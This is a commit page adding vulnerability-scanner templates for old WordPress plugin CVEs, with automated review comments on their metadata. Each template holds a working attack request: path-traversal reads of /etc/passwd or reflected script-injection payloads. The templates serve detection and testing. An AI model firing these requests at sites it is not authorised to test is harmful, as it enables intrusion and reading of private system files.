Commit
20241203
actions-user committed Dec 3, 2024
1 parent c1866e4 commit ef070c0
Showing 62 changed files with 3,181 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241202
20241203
60 changes: 60 additions & 0 deletions poc.txt


33 changes: 33 additions & 0 deletions poc/cve/CVE-2011-1669-2045.yaml
@@ -0,0 +1,33 @@
id: CVE-2011-1669

info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
- http://www.securityfocus.com/bid/47146
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-1669
tags: cve,cve2011,wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200

# Enhanced by mp on 2022/02/18
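Review bot: the `remediation` value "Upgrade to a supported version." is too vague to act on; the description pins the affected release to WP Custom Pages 0.5.0.1, so name the first fixed version, or state that the plugin should be removed if no fix was ever published. Minor consistency point in the same hunk: the regex matcher carries no `part:` while every other body matcher in this commit sets `part: body` explicitly; add it so the intent is visible at a glance.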
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-5265-2124.yaml
@@ -0,0 +1,30 @@
id: CVE-2011-5265

info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
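Review bot: the `info` block is missing `tags` and `classification.cve-id`, both of which every other template in this commit carries; without `tags` the template is silently skipped by tag-filtered runs (for example `-tags cve2011,wordpress`), and without `cve-id` it cannot be cross-referenced by CVE. `reference` is also a bare scalar here where the sibling templates use a list; switch to the list form for consistency.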
31 changes: 31 additions & 0 deletions poc/cve/CVE-2012-5913-2222.yaml
@@ -0,0 +1,31 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
tags: cve,cve2012,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2012-5913
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
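Review bot: nothing in the request path is specific to the Integrator plugin (it hits core `wp-login.php`), so detection rests entirely on the body matcher seeing the exact mixed-case `</sCripT><sCripT>alert(document.domain)</sCripT>` reflected; that is acceptable, but say so in `description` so a reviewer does not treat a clean core login page as a false negative, and keep the matcher string byte-identical to the payload. `remediation` is also absent, unlike CVE-2013-4625 in this commit.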
30 changes: 30 additions & 0 deletions poc/cve/CVE-2013-3526-2252.yaml
@@ -0,0 +1,30 @@
id: CVE-2013-3526

info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526

description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
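Review bot: `tags` and `classification.cve-id` are missing from `info`, so this template is unreachable by tag filters and cannot be looked up by CVE like the rest of the set. The description's own version statement ("possibly 3.3.2 and earlier") is not reflected in `name`; carry it into the title (with the "possibly" caveat kept) so the affected range is visible in scan output. `reference` should be a list, as in the other templates.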
36 changes: 36 additions & 0 deletions poc/cve/CVE-2013-4625-2270.yaml
@@ -0,0 +1,36 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
- https://seclists.org/bugtraq/2013/Jul/160
- https://www.htbridge.com/advisory/HTB23162
remediation: Upgrade to Duplicator 0.4.5 or later.
classification:
cve-id: CVE-2013-4625
metadata:
google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/24
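Review bot: the request passes `remove=1` to `installer.cleanup.php`; if that parameter triggers the cleanup action on the target, this template is not read-only and should say so (a note in `description` or `metadata`) so operators know it may change state before running it against production sites. Otherwise the hunk is the most complete in this commit (remediation, classification, metadata, tags) and is a good model for the others.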
31 changes: 31 additions & 0 deletions poc/cve/CVE-2015-1000012-2458.yaml
@@ -0,0 +1,31 @@
id: CVE-2015-1000012

info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"


requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"

matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200
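Review bot: `tags` is missing from `info`, so this template will not be selected by `-tags` runs alongside the other WordPress LFI checks. `cwe-id: CWE-200` (information exposure) is also a loose fit for a file-read via a user-supplied `url` path; CWE-22 (path traversal) or CWE-98 (PHP file inclusion) describes the described weakness more precisely. `cvss-score: 7.50` uses two decimals where the other templates use one.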
29 changes: 29 additions & 0 deletions poc/cve/CVE-2015-6920-2582.yaml
@@ -0,0 +1,29 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
classification:
cve-id: CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
38 changes: 38 additions & 0 deletions poc/cve/CVE-2016-1000136-2688.yaml
@@ -0,0 +1,38 @@
id: CVE-2016-1000136

info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
- https://wordpress.org/plugins/heat-trackr
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000136
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2016-1000141-2708.yaml
@@ -0,0 +1,30 @@
id: CVE-2016-1000141
info:
name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000141
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
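Review bot: `cvss-score: 6.10` is written with a trailing zero here (and in CVE-2016-1000148) while CVE-2016-1000136 and CVE-2016-1000142 in the same commit use `6.1` for the identical vector; normalise to one representation so score-based sorting and de-duplication treat them as equal.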
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000142-2712.yaml
@@ -0,0 +1,39 @@
id: CVE-2016-1000142

info:
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
- http://www.vapidlabs.com/wp/wp_advisory.php?v=435
- https://wordpress.org/plugins/parsi-font
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000142
cwe-id: CWE-79
tags: cve,cve2016,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
37 changes: 37 additions & 0 deletions poc/cve/CVE-2016-1000148-2724.yaml
@@ -0,0 +1,37 @@
id: CVE-2016-1000148

info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000148
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin s3-video v0.983"

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200

0 comments on commit ef070c0
